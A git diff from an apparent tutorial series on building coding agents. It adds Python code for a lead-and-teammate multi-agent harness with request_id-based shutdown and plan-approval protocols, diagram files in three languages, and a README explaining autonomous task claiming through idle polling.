+ + diff --git a/s16_team_protocols/code.py b/s16_team_protocols/code.py new file mode 100644 index 000000000..6a3a16b65 --- /dev/null +++ b/s16_team_protocols/code.py @@ -0,0 +1,667 @@ +#!/usr/bin/env python3 +""" +s16: Team Protocols — request-response protocol + request_id + dispatch + state machine. + +Run: python s16_team_protocols/code.py +Need: pip install anthropic python-dotenv + .env with ANTHROPIC_API_KEY + +Changes from s15: + - ProtocolState dataclass (request_id, type, sender, status, created_at) + - pending_requests dict: tracks in-flight protocol requests + - dispatch_message: routes incoming messages by type to handlers + - request_shutdown / submit_plan: Lead sends protocol requests + - handle_shutdown_request / handle_plan_request: teammate receives & responds + - match_response: Lead correlates response to original request via request_id + - 3 new tools: request_shutdown, submit_plan, review_plan + +ASCII flow: + Lead: BUS.send("shutdown_request", {request_id}) ──────→ teammate inbox + Teammate: dispatch → handler → BUS.send("shutdown_response", {request_id}) ─→ Lead inbox + Lead: match_response(request_id) → pending_requests[req_id].status = approved +""" + +import os, subprocess, json, time, random, threading +from pathlib import Path +from datetime import datetime +from dataclasses import dataclass, asdict, field + +try: + import readline + readline.parse_and_bind('set bind-tty-special-chars off') +except ImportError: + pass + +from anthropic import Anthropic +from dotenv import load_dotenv + +load_dotenv(override=True) +if os.getenv("ANTHROPIC_BASE_URL"): + os.environ.pop("ANTHROPIC_AUTH_TOKEN", None) + +WORKDIR = Path.cwd() +client = Anthropic(base_url=os.getenv("ANTHROPIC_BASE_URL")) +MODEL = os.environ["MODEL_ID"] + +# ── Task System (from s12) ── + +TASKS_DIR = WORKDIR / ".tasks" +TASKS_DIR.mkdir(exist_ok=True) + + +@dataclass +class Task: + id: str + subject: str + description: str + status: str + owner: str | None + blockedBy: list[str] + + +def _task_path(task_id: str) -> Path: + return TASKS_DIR / f"{task_id}.json" + + +def create_task(subject: str, description: str = "", + blockedBy: list[str] | None = None) -> Task: + task = Task( + id=f"task_{int(time.time())}_{random.randint(0, 9999):04d}", + subject=subject, description=description, + status="pending", owner=None, + blockedBy=blockedBy or [], + ) + save_task(task) + return task + + +def save_task(task: Task): + _task_path(task.id).write_text(json.dumps(asdict(task), indent=2)) + + +def load_task(task_id: str) -> Task: + return Task(**json.loads(_task_path(task_id).read_text())) + + +def list_tasks() -> list[Task]: + return [Task(**json.loads(p.read_text())) + for p in sorted(TASKS_DIR.glob("task_*.json"))] + + +def can_start(task_id: str) -> bool: + task = load_task(task_id) + return all(load_task(d).status == "completed" for d in task.blockedBy) + + +def claim_task(task_id: str, owner: str = "agent") -> str: + task = load_task(task_id) + if task.status != "pending": + return f"Task {task_id} is {task.status}, cannot claim" + if not can_start(task_id): + deps = [d for d in task.blockedBy if load_task(d).status != "completed"] + return f"Blocked by: {deps}" + task.owner = owner + task.status = "in_progress" + save_task(task) + print(f" \033[36m[claim] {task.subject} → in_progress\033[0m") + return f"Claimed {task.id} ({task.subject})" + + +def complete_task(task_id: str) -> str: + task = load_task(task_id) + if task.status != "in_progress": + return f"Task {task_id} is {task.status}, cannot complete" + task.status = "completed" + save_task(task) + unblocked = [t.subject for t in list_tasks() + if t.status == "pending" and t.blockedBy and can_start(t.id)] + print(f" \033[32m[complete] {task.subject} ✓\033[0m") + msg = f"Completed {task.id} ({task.subject})" + if unblocked: + msg += f"\nUnblocked: {', '.join(unblocked)}" + return msg + + +# ── Prompt Assembly (from s10) ── + +PROMPT_SECTIONS = { + "identity": "You are a coding agent. Act, don't explain.", + "tools": "Available tools: bash, read, write, edit, glob, " + "create_task, list_tasks, claim_task, complete_task, " + "spawn_teammate, send_message, check_inbox, " + "request_shutdown, submit_plan, review_plan.", + "workspace": f"Working directory: {WORKDIR}", + "planning": "For multi-step tasks, use todo_write first.", + "skills": "Skills are on demand: list_skills → load_skill.", + "team": "You can spawn teammate agents. Use request_shutdown for " + "graceful shutdown, submit_plan/review_plan for plan approval.", + "memory": "Relevant memories are injected below when available.", +} + + +def assemble_system_prompt(context: dict) -> str: + sections = [PROMPT_SECTIONS["identity"], + PROMPT_SECTIONS["tools"], + PROMPT_SECTIONS["workspace"]] + if context.get("has_todos"): + sections.append(PROMPT_SECTIONS["planning"]) + if context.get("has_skills"): + sections.append(PROMPT_SECTIONS["skills"]) + if context.get("has_team"): + sections.append(PROMPT_SECTIONS["team"]) + if context.get("memories"): + sections.append(f"Relevant memories:\n{context['memories']}") + return "\n\n".join(sections) + + +_last_context_hash, _last_prompt = None, None + + +def get_system_prompt(context: dict) -> str: + global _last_context_hash, _last_prompt + h = hash(frozenset(context.items())) + if h == _last_context_hash and _last_prompt: + return _last_prompt + _last_context_hash, _last_prompt = h, assemble_system_prompt(context) + return _last_prompt + + +# ── Tools (from s15) ── + +def safe_path(p: str) -> Path: + path = (WORKDIR / p).resolve() + if not path.is_relative_to(WORKDIR): + raise ValueError(f"Path escapes workspace: {p}") + return path + + +def run_bash(command: str) -> str: + try: + r = subprocess.run(command, shell=True, cwd=WORKDIR, + capture_output=True, text=True, timeout=120) + out = (r.stdout + r.stderr).strip() + return out[:50000] if out else "(no output)" + except subprocess.TimeoutExpired: + return "Error: Timeout (120s)" + + +def run_read(path: str, limit: int | None = None) -> str: + try: + lines = safe_path(path).read_text().splitlines() + if limit and limit < len(lines): + lines = lines[:limit] + [f"... ({len(lines) - limit} more lines)"] + return "\n".join(lines) + except Exception as e: + return f"Error: {e}" + + +def run_write(path: str, content: str) -> str: + try: + fp = safe_path(path) + fp.parent.mkdir(parents=True, exist_ok=True) + fp.write_text(content) + return f"Wrote {len(content)} bytes to {path}" + except Exception as e: + return f"Error: {e}" + + +# ── MessageBus (from s15) ── + +MAILBOX_DIR = WORKDIR / ".mailboxes" +MAILBOX_DIR.mkdir(exist_ok=True) + + +class MessageBus: + def send(self, from_agent: str, to_agent: str, content: str, + msg_type: str = "message", metadata: dict = None): + msg = {"from": from_agent, "to": to_agent, + "content": content, "type": msg_type, + "ts": time.time(), "metadata": metadata or {}} + inbox = MAILBOX_DIR / f"{to_agent}.jsonl" + with open(inbox, "a") as f: + f.write(json.dumps(msg) + "\n") + print(f" \033[33m[bus] {from_agent} → {to_agent}: " + f"({msg_type}) {content[:50]}\033[0m") + + def read_inbox(self, agent: str) -> list[dict]: + inbox = MAILBOX_DIR / f"{agent}.jsonl" + if not inbox.exists(): + return [] + msgs = [json.loads(line) for line in inbox.read_text().splitlines() + if line.strip()] + inbox.unlink() + return msgs + + +BUS = MessageBus() +active_teammates: dict[str, bool] = {} + + +# ── Protocol State (s16 new) ── + +@dataclass +class ProtocolState: + request_id: str + type: str # "shutdown" | "plan_approval" + sender: str + target: str + status: str # pending | approved | rejected + payload: str # plan text or shutdown reason + created_at: float = field(default_factory=time.time) + + +pending_requests: dict[str, ProtocolState] = {} + + +def new_request_id() -> str: + return f"req_{random.randint(0, 999999):06d}" + + +def match_response(response_type: str, request_id: str, approve: bool): + """Correlate a response to the original request via request_id.""" + state = pending_requests.get(request_id) + if not state: + print(f" \033[31m[protocol] unknown request_id: {request_id}\033[0m") + return + state.status = "approved" if approve else "rejected" + icon = "✓" if approve else "✗" + color = "32" if approve else "31" + print(f" \033[{color}m[protocol] {state.type} {icon} " + f"({request_id}: {state.status})\033[0m") + + +# ── Teammate Thread (from s15, + dispatch) ── + +def spawn_teammate_thread(name: str, role: str, prompt: str) -> str: + if name in active_teammates: + return f"Teammate '{name}' already exists" + + system = (f"You are '{name}', a {role}. " + f"Use tools to complete tasks. " + f"Check inbox for protocol messages (shutdown_request, etc).") + + def handle_inbox_message(name: str, msg: dict, messages: list): + """Dispatch incoming protocol messages by type.""" + msg_type = msg.get("type", "message") + meta = msg.get("metadata", {}) + req_id = meta.get("request_id", "") + + if msg_type == "shutdown_request": + # Teammate agrees to shutdown + BUS.send(name, "lead", "Shutting down gracefully.", + "shutdown_response", + {"request_id": req_id, "approve": True}) + print(f" \033[35m[protocol] {name} approved shutdown " + f"({req_id})\033[0m") + return True # Signal: stop the loop + + if msg_type == "plan_approval_response": + # Lead responded to teammate's plan + approve = meta.get("approve", False) + if approve: + messages.append({"role": "user", + "content": f"[Plan approved] Proceed with the task."}) + else: + messages.append({"role": "user", + "content": f"[Plan rejected] Feedback: {msg['content']}"}) + + return False # Continue the loop + + def run(): + messages = [{"role": "user", "content": prompt}] + sub_tools = [ + {"name": "bash", "description": "Run a shell command.", + "input_schema": {"type": "object", + "properties": {"command": {"type": "string"}}, + "required": ["command"]}}, + {"name": "read_file", "description": "Read file.", + "input_schema": {"type": "object", + "properties": {"path": {"type": "string"}}, + "required": ["path"]}}, + {"name": "write_file", "description": "Write file.", + "input_schema": {"type": "object", + "properties": {"path": {"type": "string"}, + "content": {"type": "string"}}, + "required": ["path", "content"]}}, + {"name": "send_message", + "description": "Send message to another agent.", + "input_schema": {"type": "object", + "properties": {"to": {"type": "string"}, + "content": {"type": "string"}}, + "required": ["to", "content"]}}, + {"name": "submit_plan", + "description": "Submit a plan for Lead approval.", + "input_schema": {"type": "object", + "properties": {"plan": {"type": "string"}}, + "required": ["plan"]}}, + ] + sub_handlers = { + "bash": run_bash, "read_file": run_read, "write_file": run_write, + "send_message": lambda to, content: (BUS.send(name, to, content), + "Sent")[1], + "submit_plan": lambda plan: _teammate_submit_plan(name, plan), + } + + for _ in range(10): + inbox = BUS.read_inbox(name) + should_stop = False + for msg in inbox: + should_stop = handle_inbox_message(name, msg, messages) + if should_stop: + break + if should_stop: + break + if inbox and not should_stop: + non_protocol = [m for m in inbox + if m.get("type") == "message"] + if non_protocol: + messages.append({"role": "user", + "content": f"{json.dumps(non_protocol)}"}) + try: + response = client.messages.create( + model=MODEL, system=system, messages=messages[-20:], + tools=sub_tools, max_tokens=8000) + except Exception: + break + messages.append({"role": "assistant", "content": response.content}) + if response.stop_reason != "tool_use": + break + results = [] + for block in response.content: + if block.type == "tool_use": + handler = sub_handlers.get(block.name) + output = handler(**block.input) if handler else "Unknown" + results.append({"type": "tool_result", + "tool_use_id": block.id, + "content": str(output)}) + messages.append({"role": "user", "content": results}) + + summary = "Done." + for msg in reversed(messages): + if msg["role"] == "assistant" and isinstance(msg["content"], list): + for b in msg["content"]: + if getattr(b, "type", None) == "text": + summary = b.text + break + else: + continue + break + BUS.send(name, "lead", summary, "result") + active_teammates.pop(name, None) + print(f" \033[32m[teammate] {name} finished\033[0m") + + active_teammates[name] = True + threading.Thread(target=run, daemon=True).start() + print(f" \033[36m[teammate] {name} spawned as {role}\033[0m") + return f"Teammate '{name}' spawned as {role}" + + +def _teammate_submit_plan(from_name: str, plan: str) -> str: + """Teammate submits a plan to Lead for approval.""" + req_id = new_request_id() + pending_requests[req_id] = ProtocolState( + request_id=req_id, type="plan_approval", + sender=from_name, target="lead", + status="pending", payload=plan) + BUS.send(from_name, "lead", plan, + "plan_approval_request", + {"request_id": req_id}) + return f"Plan submitted ({req_id}). Waiting for approval..." + + +# ── Lead Protocol Tools (s16 new) ── + +def run_request_shutdown(teammate: str) -> str: + req_id = new_request_id() + pending_requests[req_id] = ProtocolState( + request_id=req_id, type="shutdown", + sender="lead", target=teammate, + status="pending", payload="") + BUS.send("lead", teammate, "Please shut down gracefully.", + "shutdown_request", + {"request_id": req_id}) + print(f" \033[35m[protocol] shutdown_request → {teammate} " + f"({req_id})\033[0m") + return f"Shutdown request sent to {teammate} (req: {req_id})" + + +def run_submit_plan(teammate: str, plan: str) -> str: + """Lead asks a teammate to submit a plan (delegates to teammate).""" + BUS.send("lead", teammate, f"Please submit a plan for: {plan}", + "message") + return f"Asked {teammate} to submit a plan" + + +def run_review_plan(request_id: str, approve: bool, feedback: str = "") -> str: + state = pending_requests.get(request_id) + if not state: + return f"Request {request_id} not found" + if state.status != "pending": + return f"Request {request_id} already {state.status}" + state.status = "approved" if approve else "rejected" + BUS.send("lead", state.sender, feedback or ("Approved" if approve else "Rejected"), + "plan_approval_response", + {"request_id": request_id, "approve": approve}) + icon = "✓" if approve else "✗" + print(f" \033[32m[protocol] plan {icon} ({request_id})\033[0m") + return f"Plan {'approved' if approve else 'rejected'} ({request_id})" + + +# ── Basic tool handlers ── + +def run_create_task(subject: str, description: str = "", + blockedBy: list[str] | None = None) -> str: + task = create_task(subject, description, blockedBy) + deps = f" (blockedBy: {', '.join(blockedBy)})" if blockedBy else "" + print(f" \033[34m[create] {task.subject}{deps}\033[0m") + return f"Created {task.id}: {task.subject}{deps}" + + +def run_list_tasks() -> str: + tasks = list_tasks() + if not tasks: + return "No tasks." + icons = {"pending": "○", "in_progress": "●", "completed": "✓"} + lines = [] + for t in tasks: + icon = icons.get(t.status, "?") + deps = f" (blockedBy: {', '.join(t.blockedBy)})" if t.blockedBy else "" + owner = f" [{t.owner}]" if t.owner else "" + lines.append(f" {icon} {t.id}: {t.subject} [{t.status}]{owner}{deps}") + return "\n".join(lines) + + +def run_claim_task(task_id: str) -> str: + return claim_task(task_id, owner="agent") + + +def run_complete_task(task_id: str) -> str: + return complete_task(task_id) + + +def run_spawn_teammate(name: str, role: str, prompt: str) -> str: + return spawn_teammate_thread(name, role, prompt) + + +def run_send_message(to: str, content: str) -> str: + BUS.send("lead", to, content) + return f"Sent to {to}" + + +def run_check_inbox() -> str: + msgs = BUS.read_inbox("lead") + if not msgs: + return "(inbox empty)" + lines = [] + for m in msgs: + meta = m.get("metadata", {}) + req_id = meta.get("request_id", "") + tag = f" [{m['type']} req:{req_id}]" if req_id else f" [{m['type']}]" + lines.append(f" [{m['from']}]{tag} {m['content'][:200]}") + return "\n".join(lines) + + +# ── Tool Definitions ── + +TOOLS = [ + {"name": "bash", "description": "Run a shell command.", + "input_schema": {"type": "object", + "properties": {"command": {"type": "string"}}, + "required": ["command"]}}, + {"name": "read_file", "description": "Read file contents.", + "input_schema": {"type": "object", + "properties": {"path": {"type": "string"}, + "limit": {"type": "integer"}}, + "required": ["path"]}}, + {"name": "write_file", "description": "Write content to a file.", + "input_schema": {"type": "object", + "properties": {"path": {"type": "string"}, + "content": {"type": "string"}}, + "required": ["path", "content"]}}, + {"name": "create_task", + "description": "Create a task.", + "input_schema": {"type": "object", + "properties": {"subject": {"type": "string"}, + "description": {"type": "string"}, + "blockedBy": {"type": "array", + "items": {"type": "string"}}}, + "required": ["subject"]}}, + {"name": "list_tasks", + "description": "List all tasks.", + "input_schema": {"type": "object", "properties": {}, "required": []}}, + {"name": "claim_task", + "description": "Claim a pending task.", + "input_schema": {"type": "object", + "properties": {"task_id": {"type": "string"}}, + "required": ["task_id"]}}, + {"name": "complete_task", + "description": "Complete an in-progress task.", + "input_schema": {"type": "object", + "properties": {"task_id": {"type": "string"}}, + "required": ["task_id"]}}, + {"name": "spawn_teammate", + "description": "Spawn a teammate agent.", + "input_schema": {"type": "object", + "properties": {"name": {"type": "string"}, + "role": {"type": "string"}, + "prompt": {"type": "string"}}, + "required": ["name", "role", "prompt"]}}, + {"name": "send_message", + "description": "Send message to a teammate.", + "input_schema": {"type": "object", + "properties": {"to": {"type": "string"}, + "content": {"type": "string"}}, + "required": ["to", "content"]}}, + {"name": "check_inbox", + "description": "Check inbox for messages and protocol responses.", + "input_schema": {"type": "object", "properties": {}, "required": []}}, + {"name": "request_shutdown", + "description": "Request a teammate to shut down gracefully.", + "input_schema": {"type": "object", + "properties": {"teammate": {"type": "string"}}, + "required": ["teammate"]}}, + {"name": "submit_plan", + "description": "Ask a teammate to submit a plan for review.", + "input_schema": {"type": "object", + "properties": {"teammate": {"type": "string"}, + "plan": {"type": "string"}}, + "required": ["teammate", "plan"]}}, + {"name": "review_plan", + "description": "Approve or reject a submitted plan.", + "input_schema": {"type": "object", + "properties": { + "request_id": {"type": "string"}, + "approve": {"type": "boolean"}, + "feedback": {"type": "string"}}, + "required": ["request_id", "approve"]}}, +] + +TOOL_HANDLERS = { + "bash": run_bash, "read_file": run_read, "write_file": run_write, + "create_task": run_create_task, "list_tasks": run_list_tasks, + "claim_task": run_claim_task, "complete_task": run_complete_task, + "spawn_teammate": run_spawn_teammate, + "send_message": run_send_message, "check_inbox": run_check_inbox, + "request_shutdown": run_request_shutdown, + "submit_plan": run_submit_plan, "review_plan": run_review_plan, +} + + +# ── Context ── + +def update_context(context: dict, messages: list) -> dict: + text = " ".join(str(m.get("content", ""))[:200] + for m in messages[-6:]).lower() + return {"has_todos": "task" in text or "todo" in text, + "has_skills": "skill" in text, + "has_team": "teammate" in text or "spawn" in text or + "inbox" in text or "protocol" in text or "shutdown" in text, + "memories": context.get("memories", "")} + + +# ── Agent Loop ── + +def agent_loop(messages: list, context: dict): + system = get_system_prompt(context) + while True: + try: + response = client.messages.create( + model=MODEL, system=system, messages=messages, + tools=TOOLS, max_tokens=8000) + except Exception as e: + messages.append({"role": "assistant", "content": [ + {"type": "text", "text": f"[Error] {type(e).__name__}: {e}"}]}) + return + + messages.append({"role": "assistant", "content": response.content}) + if response.stop_reason != "tool_use": + return + + results = [] + for block in response.content: + if block.type != "tool_use": + continue + print(f"\033[36m> {block.name}\033[0m") + handler = TOOL_HANDLERS.get(block.name) + output = handler(**block.input) if handler else "Unknown" + print(str(output)[:300]) + results.append({"type": "tool_result", + "tool_use_id": block.id, "content": output}) + messages.append({"role": "user", "content": results}) + context = update_context(context, messages) + system = get_system_prompt(context) + + +if __name__ == "__main__": + print("s16: team protocols") + print("Enter a question, press Enter to send. Type q to quit.\n") + history = [] + context = {"has_todos": False, "has_skills": False, + "has_team": False, "memories": ""} + while True: + try: + query = input("\033[36ms16 >> \033[0m") + except (EOFError, KeyboardInterrupt): + break + if query.strip().lower() in ("q", "exit", ""): + break + history.append({"role": "user", "content": query}) + agent_loop(history, context) + context = update_context(context, history) + for block in history[-1]["content"]: + if getattr(block, "type", None) == "text": + print(block.text) + + # Check inbox for protocol responses + inbox = BUS.read_inbox("lead") + if inbox: + print(f"\n\033[33m[Inbox: {len(inbox)}]\033[0m") + for msg in inbox: + meta = msg.get("metadata", {}) + req_id = meta.get("request_id", "") + msg_type = msg.get("type", "") + if req_id and msg_type.endswith("_response"): + approve = meta.get("approve", False) + match_response(msg_type, req_id, approve) + else: + print(f" [{msg['from']}] {msg['content'][:200]}") + print() diff --git a/s16_team_protocols/images/team-protocols-overview.en.svg b/s16_team_protocols/images/team-protocols-overview.en.svg new file mode 100644 index 000000000..d73450302 --- /dev/null +++ b/s16_team_protocols/images/team-protocols-overview.en.svg @@ -0,0 +1,143 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + Team Protocols — Request-Response + request_id Correlation + State Machine + + + + s15 Preserved + + s16 New + + + + cron + + + + + messages + + + + + prompt + + + + + LLM + + + + + TOOL DISPATCH (all s15 preserved) + bash · read · write · task(4) · cron(3) · spawn · send · inbox + ★ request_shutdown · submit_plan · review_plan + + + + + + + Request-Response Protocol Flow (request_id throughout) + + + + ① Lead sends request + BUS.send("shutdown_request" + metadata={request_id}) + + + + + + ② Teammate receives + dispatch_by_type(inbox) + → handler(type, metadata) + + + + + + ③ Teammate responds + BUS.send("shutdown_response" + same request_id + approve) + + + + + + ④ Lead receives + match_response(request_id) + → resolve/reject callback + + + + + State Machine (same for both protocols) + + + pending + + + approve + + + approved + + + reject + + + rejected + + + + pending_requests Storage + pending_requests: dict[str, ProtocolState] + request_id → {type, sender, status, created_at} + match_response: find request by request_id + + + + Two protocols, one mechanism: + + shutdown_request + and + + plan_approval_request + share the same pending→approved/rejected FSM + New protocol type = new msg_type, no new state machine. request_id links request and response. + + + + + s15: MessageBus + spawn_teammate + inbox + + s16: request_id protocol + dispatch + pending_requests + state machine + diff --git a/s16_team_protocols/images/team-protocols-overview.ja.svg b/s16_team_protocols/images/team-protocols-overview.ja.svg new file mode 100644 index 000000000..106c4345a --- /dev/null +++ b/s16_team_protocols/images/team-protocols-overview.ja.svg @@ -0,0 +1,141 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + Team Protocols — リクエスト・レスポンス + request_id 紐付け + 状態機械 + + + + s15 保持 + + s16 新規 + + + + cron + + + + + messages + + + + + prompt + + + + + LLM + + + + + TOOL DISPATCH(s15 全保持) + bash · read · write · task(4) · cron(3) · spawn · send · inbox + ★ request_shutdown · submit_plan · review_plan + + + + + + + リクエスト・レスポンスプロトコルフロー(request_id が全チェーンを貫通) + + + + ① Lead が要求送信 + BUS.send("shutdown_request" + metadata={request_id}) + + + + + + ② チームメイト受信 + dispatch_by_type(inbox) + → handler(type, metadata) + + + + + + ③ チームメイト応答 + BUS.send("shutdown_response" + 同じ request_id + approve) + + + + + + ④ Lead 応答受信 + match_response(request_id) + → resolve/reject callback + + + + 状態機械(2 つのプロトコルで共通) + + + pending + + + approve + + + approved + + + reject + + + rejected + + + pending_requests ストレージ + pending_requests: dict[str, ProtocolState] + request_id → {type, sender, status, created_at} + match_response: request_id で要求を検索 + + + + 2 つのプロトコル、1 つの仕組み: + + shutdown_request + + + plan_approval_request + が pending→approved/rejected 状態機械を共有 + 新しいプロトコルタイプ = 新しい msg_type、新しい状態機械は不要。request_id が要求と応答を紐付け。 + + + + + s15: MessageBus + spawn_teammate + inbox + + s16: request_id プロトコル + dispatch + pending_requests + 状態機械 + diff --git a/s16_team_protocols/images/team-protocols-overview.svg b/s16_team_protocols/images/team-protocols-overview.svg new file mode 100644 index 000000000..5eeeba78f --- /dev/null +++ b/s16_team_protocols/images/team-protocols-overview.svg @@ -0,0 +1,148 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + Team Protocols — 请求-响应协议 + request_id 关联 + 状态机 + + + + s15 保留 + + s16 新增 + + + + cron + + + + + messages + + + + + prompt + + + + + LLM + + + + + TOOL DISPATCH (s15 全保留) + bash · read · write · task(4) · cron(3) · spawn · send · inbox + ★ request_shutdown · submit_plan · review_plan + + + + + + + 请求-响应协议流程(request_id 贯穿) + + + + ① Lead 发请求 + BUS.send("shutdown_request" + metadata={request_id}) + + + + + + ② 队友收到 + dispatch_by_type(inbox) + → handler(type, metadata) + + + + + + ③ 队友回复 + BUS.send("shutdown_response" + 同 request_id + approve) + + + + + + ④ Lead 收响应 + match_response(request_id) + → resolve/reject callback + + + + + 状态机(同一套,两种协议) + + + + pending + + + + approve + + + + approved + + + + reject + + + + rejected + + + + pending_requests 存储 + pending_requests: dict[str, ProtocolState] + request_id → {type, sender, status, created_at} + match_response: 按 request_id 找回对应请求 + + + + 两种协议,同一套机制: + + shutdown_request + + + plan_approval_request + 共用 pending→approved/rejected 状态机 + 新增协议类型 = 新的 msg_type,不需要新状态机。request_id 关联请求和响应。 + + + + + s15: MessageBus + spawn_teammate + inbox + + s16: request_id 协议 + dispatch + pending_requests + 状态机 + diff --git a/s17_autonomous_agents/README.en.md b/s17_autonomous_agents/README.en.md new file mode 100644 index 000000000..06f4fac4b --- /dev/null +++ b/s17_autonomous_agents/README.en.md @@ -0,0 +1,237 @@ +# s17: Autonomous Agents — Check the Board, Claim the Task + +[中文](README.md) · [English](README.en.md) · [日本語](README.ja.md) + +s01 → ... → s15 → s16 → `s17` → [s18](../s18_worktree_isolation/) → s19 + +> *"Check the board, claim the task"* — Poll when idle, work when available. +> +> **Harness layer**: Autonomy — Self-organizing teammates, no Lead assignment needed. + +--- + +## The Problem + +The restaurant kitchen is busy again. Previously Lead acted like a waiter, individually assigning orders to cooks — "Alice makes Kung Pao chicken, Bob makes fish." With 10 orders, Lead has to assign 10 times. If Alice finishes first, she waits for Lead to give her the next task. + +Real kitchens don't work that way. Orders are posted on the wall, and cooks tear off the next one when they finish. Nobody stands in the middle distributing. Lead just posts the orders. + +s16's teammates can communicate and handshake shutdowns. But each teammate waits for Lead to assign tasks — if the task board has 10 unclaimed tasks, Lead must manually assign 10 times. **This doesn't scale.** Teammates should check the task board themselves, find unclaimed tasks, claim them, then look for the next one when done. + +--- + +## The Solution + +![Autonomous Agents Overview](images/autonomous-agents-overview.en.svg) + +All s16 capabilities preserved (MessageBus, protocols, shutdown handshake, plan approval). Three additions: **idle_poll** (poll every 5 seconds when idle), **scan_unclaimed_tasks** (scan the board for unclaimed tasks), **auto-claim** (claim a task when found, no Lead involvement). + +Teammate lifecycle grows from two phases to three: + +| Phase | Behavior | Exit condition | +|------|------|---------| +| WORK | inbox → LLM → tool loop | `stop_reason != tool_use` | +| IDLE | Poll inbox + task board every 5s | 60s timeout | +| SHUTDOWN | Send summary, exit | — | + +--- + +## How It Works + +### idle_poll: Idle Polling + +After completing a task, teammates don't exit — they enter the IDLE phase, checking for new work every 5 seconds: + +```python +IDLE_POLL_INTERVAL = 5 # seconds +IDLE_TIMEOUT = 60 # seconds + +def idle_poll(agent_name, messages, name, role) -> bool: + """Poll for 60s. Return True if work found, False if timeout.""" + for _ in range(IDLE_TIMEOUT // IDLE_POLL_INTERVAL): # 12 times + time.sleep(IDLE_POLL_INTERVAL) + + # ① Check inbox + inbox = BUS.read_inbox(agent_name) + if inbox: + messages.append({"role": "user", + "content": f"{json.dumps(inbox)}"}) + return True + + # ② Scan task board + unclaimed = scan_unclaimed_tasks() + if unclaimed: + task = unclaimed[0] + claim_task(task["id"], agent_name) + messages.append({"role": "user", + "content": f"Task {task['id']}: " + f"{task['subject']}"}) + return True + + return False # 60s timeout → SHUTDOWN +``` + +Two checks are ordered by priority: inbox first (may contain protocol messages like shutdown_request), task board second. If either path finds work, return `True` and re-enter the WORK phase. + +### scan_unclaimed_tasks: Scan the Task Board + +Find tasks that are pending, unowned, and not blocked by dependencies: + +```python +def scan_unclaimed_tasks() -> list[dict]: + unclaimed = [] + for f in sorted(TASKS_DIR.glob("task_*.json")): + task = json.loads(f.read_text()) + if (task.get("status") == "pending" + and not task.get("owner") + and not task.get("blockedBy")): + unclaimed.append(task) + return unclaimed +``` + +All three conditions must be met: must be pending (not in_progress or completed), no owner (nobody claimed it), no blockedBy (not blocked by other tasks). The tutorial takes the first one sorted by filename; CC uses file locks to prevent multiple teammates from claiming the same task. + +### Teammate Lifecycle: WORK → IDLE → SHUTDOWN + +s16's teammates exit after finishing a task. s17 adds the IDLE phase — teammates cycle through WORK → IDLE in an outer loop: + +```python +# Outer loop: WORK → IDLE cycle +while True: + # WORK phase: inner loop (max 10 LLM calls) + for _ in range(10): + # Check inbox, handle protocol messages, call LLM, execute tools + ... + if response.stop_reason != "tool_use": + break # WORK phase ends + + # IDLE phase + found_work = idle_poll(name, messages, name, role) + if not found_work: + break # 60s timeout → SHUTDOWN + +# SHUTDOWN: send summary to Lead +BUS.send(name, "lead", summary, "result") +``` + +Key design: +- **Outer while True**: WORK and IDLE alternate until timeout +- **Inner for 10**: WORK phase has max 10 LLM call rounds (prevents infinite loops) +- **IDLE timeout 60s**: 12 polls × 5s = 60s. On timeout, send summary and exit +- **shutdown_request interrupts anytime**: Even during WORK, receiving shutdown_request in inbox stops immediately + +### Identity Re-injection + +After autoCompact (s08), a teammate's messages list may be compressed into a summary. The teammate might "forget who they are" — not knowing their name and role. On each new WORK phase entry, check: + +```python +if len(messages) <= 3: + messages.insert(0, {"role": "user", + "content": f"You are '{name}', role: {role}. " + f"Continue your work."}) +``` + +Short messages indicate compression happened, so identity info is re-injected. This is a defensive check — in real CC, context compaction preserves the system prompt, but the tutorial's simplified implementation needs manual handling. + +### Running It Together + +``` +1. Lead: "Build the backend — too many tasks, let teammates claim them" +2. Lead → create_task("Create database schema") +3. Lead → create_task("Write API routes") +4. Lead → create_task("Write unit tests") +5. Lead → spawn_teammate("alice", "backend", "You are a backend developer") +6. Lead → spawn_teammate("bob", "backend", "You are a backend developer") + +7. alice thread starts → WORK: no initial inbox → idle → IDLE +8. bob thread starts → WORK: no initial inbox → idle → IDLE + +9. alice IDLE 1st poll → scan_unclaimed → finds "Create database schema" +10. alice → claim_task → "Create database schema" → back to WORK +11. bob IDLE 1st poll → scan_unclaimed → finds "Write API routes" +12. bob → claim_task → "Write API routes" → back to WORK + +13. alice WORK: write_file("schema.sql", ...) → complete_task → WORK ends +14. alice IDLE → scan → "Write unit tests" → claim → WORK +15. alice WORK: write_file("test_api.py", ...) → complete_task → WORK ends +16. alice IDLE → 60s no new tasks → SHUTDOWN + +17. bob similar flow → finishes → SHUTDOWN +18. Lead check_inbox → sees alice and bob's summaries +``` + +Two teammates claiming and working in parallel. Lead only creates tasks and spawns teammates — no manual assignment. + +--- + +## Changes from s16 + +| Component | Before (s16) | After (s17) | +|------|-----------|-----------| +| Task assignment | Lead manually assigns | Teammates auto-claim | +| Teammate state | WORK or exit | WORK → IDLE (poll 60s) → SHUTDOWN | +| New functions | — | idle_poll, scan_unclaimed_tasks | +| Identity retention | System prompt only | Auto re-injection after compaction | +| Lead tools | 13 | 13 (unchanged) | +| Teammate tools | 5 | 7 (+list_tasks, claim_task) | +| Teammate exit condition | Exit after completing task | Exit only after 60s with no new task | + +--- + +## Try It Out + +```sh +cd learn-claude-code +python s17_autonomous_agents/code.py +``` + +Try this prompt: + +`Create 3 tasks on the board, then spawn alice and bob. Watch them auto-claim and work.` + +What to observe: Did teammates automatically claim unassigned tasks? Did they respect blockedBy dependency order? Did they auto-shutdown after idle timeout? How did task states change in the `.tasks/` directory? + +--- + +## What's Next + +Teammates are self-organizing now. But Alice and Bob both work in the same directory — Alice edits `config.py`, Bob also edits `config.py`, overwriting each other's changes. + +s18 Worktree Isolation → Each task gets its own working directory, no conflicts. + +
